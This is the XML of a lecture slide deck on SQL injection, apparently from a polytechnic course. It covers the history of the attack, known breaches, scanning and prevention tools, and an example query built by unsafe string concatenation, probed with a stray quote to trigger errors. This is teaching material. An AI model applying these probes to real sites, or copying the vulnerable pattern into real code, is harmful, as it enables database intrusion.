            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p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Tools for preventing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916113"/>
            <a:ext cx="8229600" cy="4389437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BURP proxy – free, man-in-the-middle proxy for testing web application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://portswigger.net/burp/proxy.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLiX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> – free Perl Application to crawl sites for vulnerabilities  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Category:OWASP_SQLiX_Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Scrawlr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>  - Free, limited usefulness </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://h30406.www3.hp.com/campaigns/2008/wwcampaign/1-57C4K/index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IBM Rational </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>  - Commercial tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www-01.ibm.com/software/awdtools/appscan/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>HP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>WebInspect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> – Commercial tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://h10078.www1.hp.com/cda/hpms/display/main/</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/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en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US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68313" y="1916113"/>
            <a:ext cx="8229600" cy="4389437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection attacks and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> (2009) by Justin Clarke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>et al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Book)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection: Not Only AND 1=1 (2009) by Bernardo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Damele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> A.G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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SQL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16832"/>
            <a:ext cx="7772400" cy="405079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Require some knowledge on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programming / scripting language weaknesses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Databases servers and operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="26987" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="484187" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First discovered (or at least make public) by Rain Forest Puppy  on 25/12/1998</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="484187" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“NT Web Technology Vulnerabilities” for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Phrack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www.phrack.com/issues.html?issue=54&amp;id=8#article</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="484187" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>More than 20 years BUT its still relevant!!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SQL injection related cases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dirty="0" smtClean="0"/>
              <a:t>June 2007 – Microsoft UK Event Website Hacked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dirty="0" smtClean="0"/>
              <a:t>December 2009 – NASA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dirty="0" smtClean="0"/>
              <a:t>July 2010 -  The Pirate Bay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dirty="0" smtClean="0"/>
              <a:t>Feb 2011 -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HBGray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Annoymous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dirty="0" smtClean="0"/>
              <a:t>Mar &amp; Sep 2011 – MySQL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dirty="0" smtClean="0"/>
              <a:t>…..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dirty="0" smtClean="0"/>
              <a:t>And Even in 2020!!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="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SG" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>portswigger.net/daily-swig/sql-injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pP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Background knowledge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75463" y="2711450"/>
            <a:ext cx="2027237" cy="388620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GB" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>3-tier architecture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GB" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="240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GB" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>N- tier architecture which includes the middleware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GB" altLang="en-US" sz="2400" smtClean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206625"/>
            <a:ext cx="52578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4581525"/>
            <a:ext cx="5761038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395288" y="1862138"/>
            <a:ext cx="2967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How web application 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SQL injection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" b="1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2857500" y="2000250"/>
            <a:ext cx="5829300" cy="3565525"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>You probably seen many web sites as such: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What type of web server is used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>IIS (Usually Windows)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:t>Apache (More likely Linux / Unix)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You could use Nessus to help you (http://www.nessus.org/nessus/)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GB" altLang="en-US" smtClean="0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2071688"/>
            <a:ext cx="2060575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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2771775" y="5641976"/>
            <a:ext cx="6000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Disclaimer: The pages is only a mock web page, it is not referring to any online web site.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" u="sng" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" u="sng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SQL injection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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4625" y="1935163"/>
            <a:ext cx="5972175" cy="438943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Let speculate the SQL statement as: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dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="720725" lvl="2" indent="-52388" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>EMAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the content of a variable such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>abc@sp.edu.sg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 2" panose="05020102010507070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We expect these outcome when clicked:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"Your login information has been mailed to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0" smtClean="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>"We don't recognize your email address" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Server error </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Server error + debug information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2071688"/>
            <a:ext cx="2060575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35896" y="2420888"/>
            <a:ext cx="3643312" cy="101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latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fieldlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>EMAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>+“‘”; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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SQL injection </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" b="1" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" alt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28625" y="1935163"/>
            <a:ext cx="8258175" cy="43894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Let check if the input is being sanitized properly by using proper  email with a “careless” error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dirty="0" smtClean="0"/>
              <a:t>	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dirty="0" smtClean="0"/>
              <a:t>						</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Note the extra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (quote) 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z="1000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>The extra quote will cause the SQL parse to throw an exception . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Server error  (w/without debug messages)</a:t>
            </a:r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7584" y="2898395"/>
            <a:ext cx="4000500" cy="646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Arial" charset="0"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fieldlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>@sp.edu.sg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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5454</TotalTime>
  <Words>1808</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>279</Paragraphs>
  <Slides>32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Courier New</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wood Type</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL INJECTION</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection related cases</vt:lpstr>
      <vt:lpstr>Background knowledge</vt:lpstr>
      <vt:lpstr>SQL injection  Example</vt:lpstr>
      <vt:lpstr>SQL injection  Example</vt:lpstr>
      <vt:lpstr>SQL injection  Example</vt:lpstr>
      <vt:lpstr>SQL injection  Example</vt:lpstr>
      <vt:lpstr>Types of SQL Injections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>In-Band SQL Injection</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Now for the attack!!</vt:lpstr>
      <vt:lpstr>Now for the attack!!</vt:lpstr>
      <vt:lpstr>Now for the attack!!</vt:lpstr>
      <vt:lpstr>Now for the attack!!</vt:lpstr>
      <vt:lpstr>Now for the attack!!</vt:lpstr>
      <vt:lpstr>Now for the attack!!</vt:lpstr>
      <vt:lpstr>Blind SQL Injection</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>ANALYSIS OF PAGE RESPONSE</vt:lpstr>
      <vt:lpstr>Strategy for blind sql injection</vt:lpstr>
      <vt:lpstr>ORIGINAL QUERY</vt:lpstr>
      <vt:lpstr>Verifying blind sql injection</vt:lpstr>
      <vt:lpstr>BOOLEAN-based query</vt:lpstr>
      <vt:lpstr>BOOLEAN-based query with time-based</vt:lpstr>
      <vt:lpstr>Other SQL operations</vt:lpstr>
      <vt:lpstr>Tools for SQL injections</vt:lpstr>
      <vt:lpstr>Tools for preventing injection</vt:lpstr>
      <vt:lpstr>References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Exploiting Database Server</dc:title>
  <dc:creator>LOW_Jin_Kiat@sp.edu.sg</dc:creator>
  <cp:lastModifiedBy>Low Jin Kiat</cp:lastModifiedBy>
  <cp:revision>90</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-10-22T13:49:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-20T04:04:37Z</dcterms:modified>
</cp:coreProperties>
</file>